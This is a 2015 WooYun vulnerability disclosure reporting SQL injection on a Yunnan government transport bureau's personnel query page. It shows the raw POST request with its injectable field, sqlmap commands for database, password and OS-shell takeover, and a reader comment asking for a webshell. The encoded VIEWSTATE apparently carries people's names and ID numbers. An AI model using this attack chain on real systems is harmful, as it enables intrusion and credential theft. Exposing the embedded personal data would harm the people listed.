当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136720

漏洞标题:云南省交通运输厅工程质量监督局存在SQL注入漏洞(已os-shell)

相关厂商:云南省交通运输厅工程质量监督局

漏洞作者: qglfnt

提交时间:2015-08-27 08:38

修复时间:2015-10-14 01:36

公开时间:2015-10-14 01:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-27: 细节已通知厂商并且等待厂商处理中
2015-08-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-09: 细节向核心白帽子及相关领域专家公开
2015-09-19: 细节向普通白帽子公开
2015-09-29: 细节向实习白帽子公开
2015-10-14: 细节向公众公开

简要描述:

云南省交通运输厅工程质量监督局存在SQL注入漏洞(已os-shell)

详细说明:

http://**.**.**.**/Query/Per/Query_PerList.aspx
查询处存在SQL注入

POST /Query/Per/Query_PerList.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Query/Per/Query_PerList.aspx
Cookie: ASP.NET_SessionId=s24vowxi5o4yiz3enn02ii1n
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5499
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTAxNDk0NDcyMg9kFgICAQ9kFhICAw8PFgIeCEltYWdlVXJsBSAuLi8uLi9pbWFnZXMvamlhbmxpcmVueXVhbjExLmdpZmRkAgUPDxYCHwAFHS4uLy4uL2ltYWdlcy9RdWFsdFJlc3BvbnMuanBnZGQCDQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Ag8eCVBhZ2VDb3VudAImHhVfIURhdGFTb3VyY2VJdGVtQ291bnQCsARkFgJmD2QWHgICD2QWEGYPDxYCHgRUZXh0BQE2ZGQCAw8PFgIfBQUJ6JOd5pet5Y2HZGQCBA8PFgIfBQUGJm5ic3A7ZGQCBg9kFgJmDw8WAh8FBQnok53ml63ljYdkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTc1LTEyLTAxZGQCCg8PFgIfBQUS5piG5piO55CG5bel5aSn5a2mZGQCAw9kFhBmDw8WAh8FBQE4ZGQCAw8PFgIfBQUJ5byg5bu65YWJZGQCBA8PFgIfBQUSNTMyNTI1MTk3NTA5MzAwMDMzZGQCBg9kFgJmDw8WAh8FBQnlvKDlu7rlhYlkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTc1LTA5LTMwZGQCCg8PFgIfBQUe5LqR5Y2X5Lqk6YCa6IGM5Lia5oqA5pyv5a2m6ZmiZGQCBA9kFhBmDw8WAh8FBQIxMWRkAgMPDxYCHwUFBuacseS%2FimRkAgQPDxYCHwUFEjQyMDIyMjE5NzcxMDIwODcxMWRkAgYPZBYCZg8PFgIfBQUG5pyx5L%2BKZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk3Ny0xMC0yMGRkAgoPDxYCHwUFFea5luWMl%2BecgeWfjuW7uuWtpuagoWRkAgUPZBYQZg8PFgIfBQUCMTJkZAIDDw8WAh8FBQnojIPlhYnpvplkZAIEDw8WAh8FBRI1MzAxMTIxOTc0MDExNzMyMTdkZAIGD2QWAmYPDxYCHwUFCeiMg%2BWFiem%2BmWRkAgcPDxYCHwUFA%2BeUt2RkAggPDxYCHwUFJ%2BS6keWNl%2BecgeWFrOi3r%2BW3peeoi%2BebkeeQhuWSqOivouWFrOWPuGRkAgkPDxYCHwUFCjE5NzQtMDEtMTdkZAIKDw8WAh8FBRXkupHljZfnnIHkuqTpgJrlrabmoKFkZAIGD2QWEGYPDxYCHwUFAjE2ZGQCAw8PFgIfBQUG6YKT5p2wZGQCBA8PFgIfBQUPNTMwMTIxNzUwMjE3MDAzZGQCBg9kFgJmDw8WAh8FBQbpgpPmnbBkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTc1LTAyLTE3ZGQCCg8PFgIfBQUY5piG5piO5Ya26YeR5bel5Lia5a2m5qChZGQCBw9kFhBmDw8WAh8FBQIxN2RkAgMPDxYCHwUFCeiuuOS6muaYjGRkAgQPDxYCHwUFDzUzMDEyMzYyMDUwMjMwMWRkAgYPZBYCZg8PFgIfBQUJ6K645Lqa5piMZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk2Mi0wNS0wMmRkAgoPDxYCHwUFGOS6keWNl%2BW5v%2BaSreeUteinhuWkp%2BWtpmRkAggPZBYQZg8PFgIfBQUCMThkZAIDDw8WAh8FBQnlrZnoiKrmtbdkZAIEDw8WAh8FBQ8xNTIxMDQ3MDEwMjkwMzFkZAIGD2QWAmYPDxYCHwUFCeWtmeiIqua1t2RkAgcPDxYCHwUFA%2BeUt2RkAggPDxYCHwUFJ%2BS6keWNl%2BecgeWFrOi3r%2BW3peeoi%2BebkeeQhuWSqOivouWFrOWPuGRkAgkPDxYCHwUFCjE5NzAtMTAtMjlkZAIKDw8WAh8FBQzlpKnmtKXlpKflraZkZAIJD2QWEGYPDxYCHwUFAjE5ZGQCAw8PFgIfBQUJ6ZmI5piO56OKZGQCBA8PFgIfBQUSNTMwMTI4MTk4MDAzMDIxODExZGQCBg9kFgJmDw8WAh8FBQnpmYjmmI7no4pkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTgwLTAzLTAyZGQCCg8PFgIfBQUe5LqR5Y2X55yB5YWs6Lev5bGA6IGM5bel5aSn5a2mZGQCCg9kFhBmDw8WAh8FBQIyMGRkAgMPDxYCHwUFBuaWuemTrWRkAgQPDxYCHwUFDzUzMjQwMTc2MTIxMDA5NWRkAgYPZBYCZg8PFgIfBQUG5pa56ZOtZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk3Ni0xMi0xMGRkAgoPDxYCHwUFEumVv%2BaymeS6pOmAmuWtpumZomRkAgsPZBYQZg8PFgIfBQUCMjFkZAIDDw8WAh8FBQnpgpPlu7rmmI5kZAIEDw8WAh8FBQ81MzIzMDE3NjA2MjgzOTFkZAIGD2QWAmYPDxYCHwUFCemCk%2BW7uuaYjmRkAgcPDxYCHwUFA%2BeUt2RkAggPDxYCHwUFJ%2BS6keWNl%2BecgeWFrOi3r%2BW3peeoi%2BebkeeQhuWSqOivouWFrOWPuGRkAgkPDxYCHwUFCjE5NzYtMDYtMjhkZAIKDw8WAh8FBRvkupHljZfnnIHnhaTngq3lt6XkuJrlrabmoKFkZAIMD2QWEGYPDxYCHwUFAjIyZGQCAw8PFgIfBQUJ5p2O5byA5a%2BMZGQCBA8PFgIfBQUSNTMyMTAxMTk2MzA4MTYwOTExZGQCBg9kFgJmDw8WAh8FBQnmnY7lvIDlr4xkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTYzLTA4LTE2ZGQCCg8PFgIfBQUY5LqR5Y2X5bm%2F5pKt55S16KeG5aSn5a2mZGQCDQ9kFhBmDw8WAh8FBQIyM2RkAgMPDxYCHwUFCeWuieazvea1t2RkAgQPDxYCHwUFDzUzMjIwMTY0MDQxNjU0M2RkAgYPZBYCZg8PFgIfBQUJ5a6J5rO95rW3ZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk2NC0wNC0xNmRkAgoPDxYCHwUFHuilv%2BWNl%2BacieiJsuWcsOi0qOaKgOW3peWtpuagoWRkAg4PZBYQZg8PFgIfBQUCMjRkZAIDDw8WAh8FBQnmnY7liZHomblkZAIEDw8WAh8FBRI1MzAxMDMxOTgwMTAwMTM3MTBkZAIGD2QWAmYPDxYCHwUFCeadjuWJkeiZuWRkAgcPDxYCHwUFA%2BeUt2RkAggPDxYCHwUFJ%2BS6keWNl%2BecgeWFrOi3r%2BW3peeoi%2BebkeeQhuWSqOivouWFrOWPuGRkAgkPDxYCHwUFCjE5ODAtMTAtMDFkZAIKDw8WAh8FBRjmrabmsYnkuqTpgJrnp5HmioDlpKflraZkZAIPD2QWEGYPDxYCHwUFAjI1ZGQCAw8PFgIfBQUJ5YiY6JaH6JaHZGQCBA8PFgIfBQUPNTMwMTAyODEwODA2MDAyZGQCBg9kFgJmDw8WAh8FBQnliJjolofolodkZAIHDw8WAh8FBQPlpbNkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTgxLTA4LTA2ZGQCCg8PFgIfBQUS6ZW%2F5rKZ5Lqk6YCa5a2m6ZmiZGQCEA9kFhBmDw8WAh8FBQIyNmRkAgMPDxYCHwUFCeadjuaZk%2BWNh2RkAgQPDxYCHwUFDzUzMDEyNzc0MDMxNjI3MWRkAgYPZBYCZg8PFgIfBQUJ5p2O5pmT5Y2HZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk3NC0wMy0xNmRkAgoPDxYCHwUFEumHjeW6huS6pOmAmuWtpumZomRkAg8PDxYCHwUFAzU2MGRkAhEPDxYCHwUFBDEvMzhkZAITDw8WAh4HRW5hYmxlZGhkZAIVDw8WAh8GaGRkAhcPDxYCHwZnZGQCGQ8PFgIfBmdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUJYnRuRW1wbG95BQ5idG5TdXBlcnZTdGFmZgUOYnRuRGV0ZWN0U3RhZmYFDEltYWdlQnV0dG9uMUz5F9lsShuPq%2FCgnN6r%2Bh%2Fn%2B2DpCYCuiHsMZdFFRaku&__EVENTVALIDATION=%2FwEWKwKU7qD7DwKcppSyCQKqj5uODgLN0fyTAwK6lemnBQLSwpnTCALL%2F66NDwLiga%2BNDwKBgq%2BNDwKogK%2BNDwLHgK%2BNDwL%2Bgq%2BNDwKdg6%2BNDwLmgKPHAgKFgaPHAgKs%2F6LHAgLL%2F6LHAgLigaPHAgKBgqPHAgKogKPHAgLHgKPHAgK47MDcDALnsOecDgKCmoWyCAKJqJqcCwKkkbixBQLT1d7xBgLuvvyGAQL1zJHxAwKQtq%2BGDgKdg6fHAgK47MTcDALnsOucDgKCmomyCAKJqJ6cCwKkkbyxBQLT1eLxBgLuvoCHAQL1zJXxAwKQtrOGDgKdg5vHAgKWosD8CgL7uKJncP9d4gj0xGpfEPVBSw873fdR4SaPd9hLB8VcCsIv%2BaU%3D&txtUnitName=123&ImageButton1.x=9&ImageButton1.y=5

漏洞证明:

数据包保存1.txt
sqlmap.py -r 1.txt -p txtUnitName --dbs

20150825005548.png


sqlmap.py -r 1.txt -p txtUnitName --passwords

20150825005653.png


sqlmap.py -r 1.txt -p txtUnitName --os-shell

20150825010014.jpg


20150825005833.jpg

修复方案:

过滤参数

版权声明:转载请注明来源 qglfnt@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-30 01:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-04 14:04 | 李叫兽就四李叫兽 ( 实习白帽子 | Rank:58 漏洞数:23 | 啦啦啦啦)

    给个aspx的妈呗